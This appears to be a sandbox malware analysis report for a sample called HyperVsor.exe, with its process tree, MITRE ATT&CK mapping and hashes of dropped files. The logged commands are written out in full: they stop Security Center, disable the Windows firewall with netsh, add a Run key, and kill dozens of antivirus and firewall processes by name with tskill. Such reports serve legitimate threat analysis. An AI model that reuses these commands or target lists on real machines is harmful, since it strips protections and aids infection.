- - C:\Windows\system32\tskill.exe
    tskill /A msmp*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:788
- - C:\Windows\system32\tskill.exe
    tskill /A mcafe*
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:804
- - C:\Windows\system32\tskill.exe
    tskill /A mghtml
    3⤵
    PID:2372
- - C:\Windows\system32\tskill.exe
    tskill /A msiexec
    3⤵
    PID:4612
- - C:\Windows\system32\tskill.exe
    tskill /A outpost
    3⤵
    PID:4968
- - C:\Windows\system32\tskill.exe
    tskill /A isafe
    3⤵
    PID:2252
- - C:\Windows\system32\tskill.exe
    tskill /A zap*
    3⤵
    PID:2508
- - C:\Windows\system32\tskill.exe
    tskill /A zauinst
    3⤵
    PID:3312
- - C:\Windows\system32\tskill.exe
    tskill /A upd*
    3⤵
    PID:4128
- - C:\Windows\system32\tskill.exe
    tskill /A zlclien*
    3⤵
    PID:2104
- - C:\Windows\system32\tskill.exe
    tskill /A minilog
    3⤵
    PID:1884
- - C:\Windows\system32\tskill.exe
    tskill /A cc*
    3⤵
    PID:5016
- - C:\Windows\system32\tskill.exe
    tskill /A norton*
    3⤵
    PID:1368
- - C:\Windows\system32\tskill.exe
    tskill /A norton au*
    3⤵
    PID:240
- - C:\Windows\system32\tskill.exe
    tskill /A ccc*
    3⤵
    PID:2296
- - C:\Windows\system32\tskill.exe
    tskill /A npfmn*
    3⤵
    PID:4104
- - C:\Windows\system32\tskill.exe
    tskill /A loge*
    3⤵
    PID:4164
- - C:\Windows\system32\tskill.exe
    tskill /A nisum*
    3⤵
    PID:4756
- - C:\Windows\system32\tskill.exe
    tskill /A issvc
    3⤵
    PID:3824
- - C:\Windows\system32\tskill.exe
    tskill /A tmp*
    3⤵
    PID:3388
- - C:\Windows\system32\tskill.exe
    tskill /A tmn*
    3⤵
    PID:1712
- - C:\Windows\system32\tskill.exe
    tskill /A pcc*
    3⤵
    PID:2760
- - C:\Windows\system32\tskill.exe
    tskill /A cpd*
    3⤵
    PID:1016
- - C:\Windows\system32\tskill.exe
    tskill /A pop*
    3⤵
    PID:3520
- - C:\Windows\system32\tskill.exe
    tskill /A pav*
    3⤵
    PID:2984
- - C:\Windows\system32\tskill.exe
    tskill /A padmin
    3⤵
    PID:1332
- - C:\Windows\system32\tskill.exe
    tskill /A panda*
    3⤵
    PID:3756
- - C:\Windows\system32\tskill.exe
    tskill /A avsch*
    3⤵
    PID:2112
- - C:\Windows\system32\tskill.exe
    tskill /A sche*
    3⤵
    PID:4808
- - C:\Windows\system32\tskill.exe
    tskill /A syman*
    3⤵
    PID:236
- - C:\Windows\system32\tskill.exe
    tskill /A virus*
    3⤵
    PID:3576
- - C:\Windows\system32\tskill.exe
    tskill /A realm*
    3⤵
    PID:852
- - C:\Windows\system32\tskill.exe
    tskill /A sweep*
    3⤵
    PID:1088
- - C:\Windows\system32\tskill.exe
    tskill /A scan*
    3⤵
    PID:2072
- - C:\Windows\system32\tskill.exe
    tskill /A ad-*
    3⤵
    PID:4344
- - C:\Windows\system32\tskill.exe
    tskill /A safe*
    3⤵
    PID:2416
- - C:\Windows\system32\tskill.exe
    tskill /A avas*
    3⤵
    PID:1280
- - C:\Windows\system32\tskill.exe
    tskill /A norm*
    3⤵
    PID:3160
- - C:\Windows\system32\tskill.exe
    tskill /A offg*
    3⤵
    PID:4816
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:3836

C:\Users\Admin\Desktop\HyperVsor.exe
"C:\Users\Admin\Desktop\HyperVsor.exe"
1⤵
- Adds Run key to start application
PID:1816
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c "executor.bat"
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:2052
- - C:\Windows\system32\net.exe
    net stop "Security Center"
    3⤵
    PID:576
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Security Center"
      4⤵
      PID:880
- - C:\Windows\system32\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:584
- - C:\Windows\system32\tskill.exe
    tskill /A av*
    3⤵
    PID:2824
- - C:\Windows\system32\tskill.exe
    tskill /A fire*
    3⤵
    PID:3444
- - C:\Windows\system32\tskill.exe
    tskill /A anti*
    3⤵
    PID:2220
- - C:\Windows\system32\tskill.exe
    tskill /A spy*
    3⤵
    PID:2764
- - C:\Windows\system32\tskill.exe
    tskill /A bullguard
    3⤵
    PID:4276
- - C:\Windows\system32\tskill.exe
    tskill /A PersFw
    3⤵
    PID:4656
- - C:\Windows\system32\tskill.exe
    tskill /A KAV*
    3⤵
    PID:3524
- - C:\Windows\system32\tskill.exe
    tskill /A ZONEALARM
    3⤵
    PID:1508
- - C:\Windows\system32\tskill.exe
    tskill /A SAFEWEB
    3⤵
    PID:3560
- - C:\Windows\system32\tskill.exe
    tskill /A OUTPOST
    3⤵
    PID:4848
- - C:\Windows\system32\tskill.exe
    tskill /A nv*
    3⤵
    PID:940
- - C:\Windows\system32\tskill.exe
    tskill /A nav*
    3⤵
    PID:4556
- - C:\Windows\system32\tskill.exe
    tskill /A F-*
    3⤵
    PID:3652
- - C:\Windows\system32\tskill.exe
    tskill /A ESAFE
    3⤵
    PID:4564
- - C:\Windows\system32\tskill.exe
    tskill /A cle
    3⤵
    PID:4252
- - C:\Windows\system32\tskill.exe
    tskill /A BLACKICE
    3⤵
    PID:2116
- - C:\Windows\system32\tskill.exe
    tskill /A def*
    3⤵
    PID:4448
- - C:\Windows\system32\tskill.exe
    tskill /A kav
    3⤵
    PID:3848
- - C:\Windows\system32\tskill.exe
    tskill /A kav*
    3⤵
    PID:1068
- - C:\Windows\system32\tskill.exe
    tskill /A avg*
    3⤵
    PID:4860
- - C:\Windows\system32\tskill.exe
    tskill /A ash*
    3⤵
    PID:3396
- - C:\Windows\system32\tskill.exe
    tskill /A aswupdsv
    3⤵
    PID:3904
- - C:\Windows\system32\tskill.exe
    tskill /A ewid*
    3⤵
    PID:1980
- - C:\Windows\system32\tskill.exe
    tskill /A guard*
    3⤵
    PID:3136
- - C:\Windows\system32\tskill.exe
    tskill /A guar*
    3⤵
    PID:1836
- - C:\Windows\system32\tskill.exe
    tskill /A msmp*
    3⤵
    PID:728
- - C:\Windows\system32\tskill.exe
    tskill /A mcafe*
    3⤵
    PID:1944
- - C:\Windows\system32\tskill.exe
    tskill /A mghtml
    3⤵
    PID:3156
- - C:\Windows\system32\tskill.exe
    tskill /A msiexec
    3⤵
    PID:992
- - C:\Windows\system32\tskill.exe
    tskill /A outpost
    3⤵
    PID:3044
- - C:\Windows\system32\tskill.exe
    tskill /A isafe
    3⤵
    PID:4616
- - C:\Windows\system32\tskill.exe
    tskill /A zap*
    3⤵
    PID:2020
- - C:\Windows\system32\tskill.exe
    tskill /A zauinst
    3⤵
    PID:3132
- - C:\Windows\system32\tskill.exe
    tskill /A upd*
    3⤵
    PID:2996
- - C:\Windows\system32\tskill.exe
    tskill /A zlclien*
    3⤵
    PID:3740
- - C:\Windows\system32\tskill.exe
    tskill /A minilog
    3⤵
    PID:2032
- - C:\Windows\system32\tskill.exe
    tskill /A cc*
    3⤵
    PID:1284
- - C:\Windows\system32\tskill.exe
    tskill /A norton*
    3⤵
    PID:4372
- - C:\Windows\system32\tskill.exe
    tskill /A norton au*
    3⤵
    PID:2176
- - C:\Windows\system32\tskill.exe
    tskill /A ccc*
    3⤵
    PID:4980
- - C:\Windows\system32\tskill.exe
    tskill /A npfmn*
    3⤵
    PID:2432
- - C:\Windows\system32\tskill.exe
    tskill /A loge*
    3⤵
    PID:4532
- - C:\Windows\system32\tskill.exe
    tskill /A nisum*
    3⤵
    PID:4752
- - C:\Windows\system32\tskill.exe
    tskill /A issvc
    3⤵
    PID:2264
- - C:\Windows\system32\tskill.exe
    tskill /A tmp*
    3⤵
    PID:1420
- - C:\Windows\system32\tskill.exe
    tskill /A tmn*
    3⤵
    PID:4396
- - C:\Windows\system32\tskill.exe
    tskill /A pcc*
    3⤵
    PID:1448
- - C:\Windows\system32\tskill.exe
    tskill /A cpd*
    3⤵
    PID:1512
- - C:\Windows\system32\tskill.exe
    tskill /A pop*
    3⤵
    PID:4256
- - C:\Windows\system32\tskill.exe
    tskill /A pav*
    3⤵
    PID:4768
- - C:\Windows\system32\tskill.exe
    tskill /A padmin
    3⤵
    PID:2820
- - C:\Windows\system32\tskill.exe
    tskill /A panda*
    3⤵
    PID:2472
- - C:\Windows\system32\tskill.exe
    tskill /A avsch*
    3⤵
    PID:4788
- - C:\Windows\system32\tskill.exe
    tskill /A sche*
    3⤵
    PID:820
- - C:\Windows\system32\tskill.exe
    tskill /A syman*
    3⤵
    PID:4400
- - C:\Windows\system32\tskill.exe
    tskill /A virus*
    3⤵
    PID:4052
- - C:\Windows\system32\tskill.exe
    tskill /A realm*
    3⤵
    PID:1544
- - C:\Windows\system32\tskill.exe
    tskill /A sweep*
    3⤵
    PID:1608
- - C:\Windows\system32\tskill.exe
    tskill /A scan*
    3⤵
    PID:4512
- - C:\Windows\system32\tskill.exe
    tskill /A ad-*
    3⤵
    PID:2124
- - C:\Windows\system32\tskill.exe
    tskill /A safe*
    3⤵
    PID:4648
- - C:\Windows\system32\tskill.exe
    tskill /A avas*
    3⤵
    PID:1560
- - C:\Windows\system32\tskill.exe
    tskill /A norm*
    3⤵
    PID:3572
- - C:\Windows\system32\tskill.exe
    tskill /A offg*
    3⤵
    PID:348
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:2964

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9af507866fb23dace6259791c377531f

SHA1
5a5914fc48341ac112bfcd71b946fc0b2619f933

SHA256
5fb3ec65ce1e6f47694e56a07c63e3b8af9876d80387a71f1917deae690d069f

SHA512
c58c963ecd2c53f0c427f91dc41d9b2a9b766f2e04d7dae5236cb3c769d1f048e4a342ea75e4a690f3a207baa1d3add672160c1f317abfe703fd1d2216b1baf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b0177afa818e013394b36a04cb111278

SHA1
dbc5c47e7a7df24259d67edf5fbbfa1b1fae3fe5

SHA256
ffc2c53bfd37576b435309c750a5b81580a076c83019d34172f6635ff20c2a9d

SHA512
d3b9e3a0a99f191edcf33f3658abd3c88afbb12d7b14d3b421b72b74d551b64d2a13d07db94c90b85606198ee6c9e52072e1017f8c8c6144c03acf509793a9db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\174ca080-5166-4f9e-82ae-62b512f43797.tmp

Filesize
5KB

MD5
8d485e8fa80cfc5b3a16f136ec53e8b4

SHA1
2163dd98c9e7193451108316a6079b852e240fcd

SHA256
499aae71ee816052dc01309dd2364ab32b9defa16deb772362c50b9c080a33f5

SHA512
9b20d7bb05c2411c01ab1ffd4660f40441f5c007b47914346cb7449d98f675eae3e804b72d03354a111f520ae602967734ee05ef93d0f0e1104f291045030908

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
186B

MD5
094ab275342c45551894b7940ae9ad0d

SHA1
2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

SHA256
ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

SHA512
19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
43c9b30a21913eec141a4cf695047f5b

SHA1
afc47eb8243fa7b8363ae428b77a906f6fce10d4

SHA256
a294e721fe5f2d11c3c6c45a9e48dca6a1ddbd72b5a4420ade49bba1db5d34ea

SHA512
fc5405fb1cb536d65a05db54d1da75ebd75d640ed9b1a4d142a322afe5b83f764ba4ef14773dc4474c75c0328ecaa686b82a7dc7fb498f7078e87f996c3bd261

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
37332a4cb9e0f0dbdf9b36dfd2929e22

SHA1
a04b8d805be77d043ef0cb5e5412162ca3014b0e

SHA256
3ef891e033bc14e90ef25afb77cfd7a1318d01587d17e31d81691210fa82cdcd

SHA512
f632a95d1135ff47b7fc2e343b75d7865cb723e42ec0cd62e679bb171e09d6dfdec6f3bc5902fb9b85b5ce99718f705eaa71f854c2259308dd5f2ca36bb959f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6fcdfea249f7e940bfb36b18d5b6c3b2

SHA1
05b92db2df4d27d91ba7b66bad84c3e8fabc1406

SHA256
442c1dadc112cc6556d52dc184816335a9ea37154111a3767ee33886453dd32d

SHA512
1df65c4bd0224418b0f3f92a1e999364a78d601727e93e409055539ec88ed50535fe3376f14a0cc96520249f7ec2be87f138269acfce8c234d5cbbdcab6eb408

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
95bc17e4f43328c325c5ca924460284a

SHA1
96d01ad8c5208aa1d644fce1681c67e9a867c82b

SHA256
8a59f98b190e93b65e7ff80646e6b9ba24b11811b9889eafe15a8b9535da3e71

SHA512
975030aa9473cc97ae9ff7f69c41b07b35c468c6396651da2856d47149bbe5657ae9ab78b108615aa04ba5b43ca3e19125ac72313392428bc855cec25b004e22

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\PathHost

Filesize
22.9MB

MD5
fa45254989907fb3b0843692d14bc8ec

SHA1
37488bf58b2d3cc5c19aeff3303c1b2f9e714aed

SHA256
8dcd4c6e7adc31b73807899717566d08aff8c0dea298489afa4177968fb42758

SHA512
1d1a07ee70b33fc0e92cd5fd45d7ac04caf6be81caac34e1b1b97bf4b9e04ca81b0d9a29d4ee7452e1443bb075a230b1791a3ec29e57a1b6da0041d66a2582ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\PathHost

Filesize
17.6MB

MD5
77ca8571f3a748bfac554e7992e07fea

SHA1
4294a83e1d766711053a789a630d62959c81b2b7

SHA256
cf2e3f7d7ef78af9c4b9f0a612336be47bbb0e78f25837730a896c9474fc9c39

SHA512
e0ddd477e13d07a39ebaf8edd3dbc9c3d1655a2482faf5697321e66dd30980e0ba1167e902fbb16b8196ada62effca915ceb0afc5deb4053ec5dee50665e5655

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\executor.bat

Filesize
7KB

MD5
a743a18699ae3c0f913f4376887e966e

SHA1
4cee00ee5a517e64a8f8dcf4e2641ff97c46861c

SHA256
2997028bcadf4be1402cb07f80a37defabf91f230584f125b45d9f662fa90ac7

SHA512
25f152f294c39abc66e74ff126f82e198bea5f256fb538e224e713411044b2e40fd605a7dc11293fe44611a87d7bc5f957ae317767d58015435b5088780442c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nokeyboard.reg

Filesize
1KB

MD5
fa5412123f5ef3f83c2bd8b8c23fdf4d

SHA1
5d2a7c634ac64fe9a40fbc217d25178f77c118a9

SHA256
a029ae77eced03e515a2acb0ee8ebecf3aebea402e441beef1615e3488234f8e

SHA512
bdc6d8201b1a334bfd3f204cf4e633f02d024ac693dcb5816f604a885c23f33c1db03dd07378f13d08fa4255fbd642782142a6f7f7f1647b3c26a2c7cd544d54

Download Submit
C:\Users\Admin\Downloads\HyperVsor.exe:Zone.Identifier

Filesize
221B

MD5
e3ba8a8b6b6d318d6e1a8de5dfddd936

SHA1
3f99eefcdd351066c93d2003c0c1471abee4ce99

SHA256
9b74265a8abb3d288e6cd9478915ff97cf7fefbafbaee87959fa97ef125055aa

SHA512
bb679b41dc256803fcd36a6fbb24f7c083598eba9984f3830d2eab8c14db878bcd5ef1d31961f98178e640be00a87494c01dc046b9c99587683f272733a28dd7

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 952083.crdownload

Filesize
172KB

MD5
d8b562130be0a9da45d883dd1d4b294a

SHA1
056fc03d7700a644e89b901a1ed9b28074d969a9

SHA256
6079f6f14b0bfec8c58f4a13f32b685e2e5efeaa20894946f81a82977b1f3309

SHA512
5eee6a717695ca87d981836d5c8ab4a3e99c077d7802b1bb30d980d86558edda8dd2129f23f951a711691720242a8fbff1359c4b6aa5c88dc3aca1e14069fc64

Download Submit